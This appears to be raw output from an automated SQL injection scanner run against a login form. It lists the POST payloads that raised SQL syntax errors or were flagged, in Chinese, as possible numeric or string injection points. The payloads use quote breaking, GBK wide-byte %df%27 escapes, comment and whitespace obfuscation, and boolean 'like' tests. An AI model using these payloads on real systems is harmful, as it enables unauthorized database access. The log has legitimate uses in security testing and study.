[+1+] SQL syntax  [1595] payload : [uname=123'&passwd=123&submit=Submit]
[+3+] SQL syntax  [1595] payload : [uname=123%df%27&passwd=123&submit=Submit]
[+5+] SQL syntax  [1595] payload : [uname=123\&passwd=123&submit=Submit]
[+14+] SQL syntax  [1597] payload : [uname=123&passwd=123'&submit=Submit]
[+16+] SQL syntax  [1598] payload : [uname=123&passwd=123%df%27&submit=Submit]
[+18+] SQL syntax  [1597] payload : [uname=123&passwd=123\&submit=Submit]
[$4$] 可能存在数字注入  [1536] payload : [uname=123%df%22&passwd=123&submit=Submit]
[$17$] 可能存在数字注入  [1536] payload : [uname=123&passwd=123%df%22&submit=Submit]
[+4+] SQL syntax  [1611] payload : [uname=123'/***/and/***/1/***/like/***/1/***/ &passwd=123&submit=Submit]
[+10+] SQL syntax  [1647] payload : [uname=123')/***/and/***/1/***/like/***/1/***/ &passwd=123&submit=Submit]
[+11+] SQL syntax  [1649] payload : [uname=123')/***/and/***/1/***/like/***/1/***/--+&passwd=123&submit=Submit]
[+12+] SQL syntax  [1647] payload : [uname=123')/***/and/***/1/***/like/***/1/***/%23&passwd=123&submit=Submit]
[+19+] SQL syntax  [1592] payload : [uname=123&passwd=123'/***/and/***/1/***/like/***/1/***/ &submit=Submit]
[+25+] SQL syntax  [1628] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1/***/ &submit=Submit]
[+26+] SQL syntax  [1630] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1/***/--+&submit=Submit]
[+27+] SQL syntax  [1628] payload : [uname=123&passwd=123')/***/and/***/1/***/like/***/1/***/%23&submit=Submit]
[+1+] SQL syntax  [1595] payload : [uname=123'&passwd=123&submit=Submit]
[+3+] SQL syntax  [1595] payload : [uname=123%df%27&passwd=123&submit=Submit]
[+5+] SQL syntax  [1595] payload : [uname=123\&passwd=123&submit=Submit]
[+14+] SQL syntax  [1597] payload : [uname=123&passwd=123'&submit=Submit]
[+16+] SQL syntax  [1598] payload : [uname=123&passwd=123%df%27&submit=Submit]
[+18+] SQL syntax  [1597] payload : [uname=123&passwd=123\&submit=Submit]
[+67+] SQL syntax  [1617] payload : [uname=123')/***/&&/***/1/***/like/***/1/***/%23&passwd=123&submit=Submit]
[+70+] SQL syntax  [1592] payload : [uname=123&passwd=123'%09&&%091%09like%091%09%23&submit=Submit]
[+72+] SQL syntax  [1610] payload : [uname=123&passwd=123')%09and%091%09like%091%09--+&submit=Submit]
[$4$] 可能存在注入  [1536] payload : [uname=123%df%22&passwd=123&submit=Submit]
[$17$] 可能存在注入  [1536] payload : [uname=123&passwd=123%df%22&submit=Submit]
[$42$] 可能存在数字型注入  [1536] payload : [uname=123%a0and%a01&passwd=123&submit=Submit]
[$44$] 可能存在数字型注入  [1536] payload : [uname=123%a0&&%a01|1&passwd=123&submit=Submit]
[$52$] 可能存在数字型注入  [1536] payload : [uname=123&passwd=123%a0&&%a01|1&submit=Submit]
[$53$] 可能存在数字型注入  [1536] payload : [uname=123&passwd=123%a0&&%a01||1&submit=Submit]
[$66$] 可能存在字符型注入  [1536] payload : [uname=123"%a0&&%a01%a0like%a01%a0--+&passwd=123&submit=Submit]
[$71$] 可能存在字符型注入  [1536] payload : [uname=123&passwd=123"%a0and%a01%a0like%a01%a0--+&submit=Submit]
